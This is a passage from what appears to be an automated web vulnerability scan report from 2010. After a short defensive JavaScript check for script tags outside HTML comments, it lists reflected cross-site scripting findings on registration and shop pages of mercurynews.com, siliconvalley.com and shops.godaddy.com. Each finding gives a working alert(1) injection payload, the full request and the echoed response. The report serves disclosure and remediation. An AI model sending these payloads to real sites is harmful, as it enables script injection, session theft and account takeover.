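// appears outside any comment, i.e. whether it would actually execute.
function scriptOutsideComment(html) {
  let inComment = false;
  let i = 0;
  while (i < html.length) {
    if (!inComment && html.startsWith('<!--', i)) { inComment = true; i += 4; continue; }
    if (inComment && html.startsWith('-->', i)) { inComment = false; i += 3; continue; }
    if (inComment && html.startsWith('--!>', i)) { inComment = false; i += 4; continue; }
    if (!inComment && /^<script\b/i.test(html.slice(i, i + 8))) return true;
    i += 1;
  }
  return false;
}
```

Validation rather than encoding is the right tool here: a comment carries nothing the browser renders, so the only safe content is data the application already knows to be well-formed. Filters that look only for --> miss the --!> terminator, which is why the check above honours both.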

3.201. https://secure.www.mercurynews.com/registration/ [rPage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /registration/

Issue detail

The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb02</script><script>alert(1)</script>47f9d8515fe was submitted in the rPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /registration/?rPage=login6fb02</script><script>alert(1)</script>47f9d8515fe&url=http%3A%2F%2Fwww.mercurynews.com%2F&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 15 Nov 2010 02:09:38 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=0QISC2X0JL2UMCUUCBWCFFI; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info --><
...[SNIP]...
rBrand = getBrand2(s_account);
var PageName = "Registration";
var SectionName = "Registration";
var ArticleTitle = "null";
           var FriendlyName = "Registration: login6fb02</script><script>alert(1)</script>47f9d8515fe";
           var domainName = getDomainName();
           userObj = new omniObj();
           userObj.load();
           userObj.update();
           userObj.save();
/* You may give each page an identifying name, server, and cha
...[SNIP]...

3.202. https://secure.www.mercurynews.com/registration/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /registration/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 586df"><script>alert(1)</script>cb76424f007 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/?rPage=login&url=http%3A%2F%2Fwww.mercurynews.com%2F586df"><script>alert(1)</script>cb76424f007&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=XBSY2AYHL45GQCUUCAWSFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info --><
...[SNIP]...
<a href="/registration?rPage=register&url=http://www.mercurynews.com/586df"><script>alert(1)</script>cb76424f007&register=yes">
...[SNIP]...

3.203. https://secure.www.siliconvalley.com/registration/ [rPage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.siliconvalley.com
Path:   /registration/

Issue detail

The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6715d</script><script>alert(1)</script>1b9e22d4bd9 was submitted in the rPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /registration/?rPage=login6715d</script><script>alert(1)</script>1b9e22d4bd9&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.siliconvalley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 15 Nov 2010 02:09:40 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=LX5GZDZ3HBPL0CUUCAXCFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!--
...[SNIP]...
rBrand = getBrand2(s_account);
var PageName = "Registration";
var SectionName = "Registration";
var ArticleTitle = "null";
           var FriendlyName = "Registration: login6715d</script><script>alert(1)</script>1b9e22d4bd9";
           var domainName = getDomainName();
           userObj = new omniObj();
           userObj.load();
           userObj.update();
           userObj.save();
/* You may give each page an identifying name, server, and cha
...[SNIP]...

3.204. https://secure.www.siliconvalley.com/registration/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.siliconvalley.com
Path:   /registration/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c8a"><script>alert(1)</script>4c191ca7cfb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F13c8a"><script>alert(1)</script>4c191ca7cfb&eRightsSessionExpired=true HTTP/1.1
Host: secure.www.siliconvalley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=4ISA2QSZCYI1ECUUCAXCFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!--
...[SNIP]...
<a href="/registration?rPage=register&url=http://www.siliconvalley.com/13c8a"><script>alert(1)</script>4c191ca7cfb&register=yes">
...[SNIP]...

3.205. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73226"%3balert(1)//8a48a0b359e was submitted in the isc parameter. This input was echoed as 73226";alert(1)//8a48a0b359e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A09273226"%3balert(1)//8a48a0b359e&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 177018
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=533i2z55uu1dxfvfftthjh55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:37 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT03A09273226";alert(1)//8a48a0b359e&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.206. http://shops.godaddy.com/Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea was submitted in the isc parameter. This input was echoed as 1d886"style="x:expression(alert(1))"2c644fcb8ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The attack demonstrated closes the attribute and adds a style attribute containing a dynamically evaluated CSS expression to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to Internet Explorer, so this particular payload may not work in other browsers; the underlying attribute breakout itself is browser-independent.

Request

GET /Blankterrmall/BRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED/?isc=GPPT03A0921d886"style%3d"x%3aexpression(alert(1))"2c644fcb8ea&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 179107
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=m3otdjbtjn0j1jaaieauxc55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Fri, 19-Nov-2010 23:17:24 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|BRAND+NEW+P90X+Extreme+Home+Fitness+13+DVD,%2fBlankterrmall%2fBRAND-NEW-P90X-Extreme-Home-Fitness-13-DVD-ONLY-WITH-GUIDES-INCLUDED%2f?plv=false,1207793|; expires=Tue, 14-Dec-2010 23:17:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT03A0921d886"style="x:expression(alert(1))"2c644fcb8ea&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.207. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e038"%3balert(1)//b62314b1d25 was submitted in the isc parameter. This input was echoed as 5e038";alert(1)//b62314b1d25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C0215e038"%3balert(1)//b62314b1d25&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 180898
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=mznsn145q0mxr0vyei2mbbbu; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:32 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C0215e038";alert(1)//b62314b1d25&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";
var pcj_isMgr = false;
var pcj_idpredirect = "";
var pcj_ssoTargetKey = "target";
var pcj_isCart = false;
var pcj_isCmnty = false;
var pcj_cname = "ShopperId1
...[SNIP]...

3.208. http://shops.godaddy.com/FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3 was submitted in the isc parameter. This input was echoed as 214f7"style="x:expression(alert(1))"bebbc1845c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /FOURTH-RIVER-OC-CORP/LIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS/?isc=GPPT02C021214f7"style%3d"x%3aexpression(alert(1))"bebbc1845c3&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 182987
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=r5khpde40hdl1y55kfe0vo55; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Fri, 19-Nov-2010 23:16:19 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|LIPODRESS%2c+LIPO+DRESS%2c+THE+NEW+MOLDING+DRESS,%2fFOURTH-RIVER-OC-CORP%2fLIPODRESS-LIPO-DRESS-THE-NEW-MOLDING-DRESS%2f?plv=false,1051087|; expires=Tue, 14-Dec-2010 23:16:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C021214f7"style="x:expression(alert(1))"bebbc1845c3&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.209. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94034"style%3d"x%3aexpression(alert(1))"3c8f6d48244 was submitted in the isc parameter. This input was echoed as 94034"style="x:expression(alert(1))"3c8f6d48244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C02194034"style%3d"x%3aexpression(alert(1))"3c8f6d48244&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173188
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=2zrwhnzamnwxhzezt4jdh3v5; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:02 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C02194034"style="x:expression(alert(1))"3c8f6d48244&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.210. http://shops.godaddy.com/Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6439"%3balert(1)//fdb982fc19a was submitted in the isc parameter. This input was echoed as c6439";alert(1)//fdb982fc19a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Go-Daddy-Gear/Go-Daddy-Tank-Top-for-Her/?isc=GPPT02C021c6439"%3balert(1)//fdb982fc19a&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170552
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=djnvm2vqgewrps45qyay4j45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Fri, 19-Nov-2010 23:17:11 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Go+Daddy+Tank+for+Her,%2fGo-Daddy-Gear%2fGo-Daddy-Tank-Top-for-Her%2f?plv=false,30534|; expires=Tue, 14-Dec-2010 23:17:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:17:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
j_url_mya="https://mya.godaddy.com/";var pcj_url_img="http://img5.wsimg.com/";var pcj_url_cmnty="http://community.godaddy.com/";var pcj_login_root_url="https://idp.godaddy.com/login.aspx?isc=GPPT02C021c6439";alert(1)//fdb982fc19a&ci=9106&prog_id=GoDaddy&spkey=GDMKTB005";var pcj_isMgr = false;var pcj_idpredirect = "";var pcj_ssoTargetKey = "target";var pcj_isCart = false;var pcj_isCmnty = false;var pcj_cname = "ShopperId1";var
...[SNIP]...

3.211. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Myasiatrade-com/Flotap-t1000/

Issue detail

The value of the isc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8266"style%3d"x%3aexpression(alert(1))"29256dd5172 was submitted in the isc parameter. This input was echoed as e8266"style="x:expression(alert(1))"29256dd5172 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e8266"style%3d"x%3aexpression(alert(1))"29256dd5172&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 174449
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=i1pwcp55ajzxrbn5oho1so45; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:40 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
<div style="width:222px;height:55px;" onclick="pcj_lnk('http://www.godaddy.com/default.aspx?isc=GPPT02C021e8266"style="x:expression(alert(1))"29256dd5172&ci=13333'); return false;" title="GoDaddy.com">
...[SNIP]...

3.212. http://shops.godaddy.com/Myasiatrade-com/Flotap-t1000/ [isc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.godaddy.com
Path:   /Myasiatrade-com/Flotap-t1000/

Issue detail

The value of the isc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5995"%3balert(1)//7fede595aaa was submitted in the isc parameter. This input was echoed as e5995";alert(1)//7fede595aaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Myasiatrade-com/Flotap-t1000/?isc=GPPT02C021e5995"%3balert(1)//7fede595aaa&domain=sftimes.com HTTP/1.1
Host: shops.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 172360
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Set-Cookie: ASP.NET_SessionId=a0k3unrokggtlhrq10nlirez; path=/; HttpOnly
Set-Cookie: mp_RecentlyViewedProducts=Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Fri, 19-Nov-2010 23:16:52 GMT; path=/
Set-Cookie: mp_RecentlyViewedProducts=|Android+tablet,%2fMyasiatrade-com%2fFlotap-t1000%2f?plv=false,1212585|; expires=Tue, 14-Dec-2010 23:16:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:16:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00
...[SNIP]...
rl_mya="https://mya.godaddy.com/";
var pcj_url_img="http://img5.wsimg.com/";
var pcj_url_cmnty="http://community.godaddy.com/";
